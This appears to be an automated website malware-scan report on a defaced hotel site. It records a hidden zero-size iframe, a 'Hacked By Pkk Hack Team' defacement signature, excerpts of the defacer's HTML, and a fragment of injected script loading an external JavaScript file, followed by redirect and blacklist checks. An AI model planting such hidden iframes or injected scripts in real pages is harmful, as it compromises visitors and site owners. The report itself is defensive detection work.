Scanned pages/files
Request | Server response | Status |
http://kumlaugurotel.com/ | 200 OK Content-Length: 88325 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 0x0 src: http://www.youtube.com/embed/fffnvmkdcvu?rel=0&autoplay=1 <iframe width="0" height="0" src="http://www.youtube.com/embed/fffnvmkdcvu?rel=0&autoplay=1" frameborder="0" allowfullscreen> Deface/Content modification. The following signature was found: Hacked By Pkk Hack Team ...[3985 bytes skipped]... ipt1.js'); qscript.setAttribute('type','text/javascript');qscript.async = true; if(zhead && !document.getElementById('wsh2_js')) zhead.appendChild(qscript); } </script> <meta http-equiv="Content-Language" content="tr"> <meta http-equiv="Content-Type" content="text/html; charset=windows-1254"> <title>Hacked By Pkk Hack Team</title> <bgsound src="http://www.pravda.b0x.com/agit.mp3" loop="-1"> <style type="text/css"> <!-- .style1 { color: #FFFFFF; font-weight: bold; font-size: 22px; } --> </style> </head> <body bgcolor="#000000"> <table border="1" width="100%" id="table1" style="border-width: 0px"> <tr> <td bgcolor="#FF0000" style="border-style: none ...[103396 bytes skipped]... | ||
http://kumlaugurotel.com/test404page.js | 404 Not Found Content-Length: 5217 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: kumlaugurotel.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 30 Sep 2014 18:02:27 GMT
Server: Microsoft-IIS/7.5
Content-Length: 88325
Content-Type: text/html; charset=uf8_turkish_ci
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
...88325 bytes of data.
GET / HTTP/1.1
Host: kumlaugurotel.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 30 Sep 2014 18:02:27 GMT
Server: Microsoft-IIS/7.5
Content-Length: 88325
Content-Type: text/html; charset=uf8_turkish_ci
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
...88325 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: kumlaugurotel.com
Referer: http://www.google.com/search?q=kumlaugurotel.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: kumlaugurotel.com
Referer: http://www.google.com/search?q=kumlaugurotel.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kumlaugurotel.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://kumlaugurotel.com/
Result: kumlaugurotel.com is not infected or malware details are not published yet.
Result: kumlaugurotel.com is not infected or malware details are not published yet.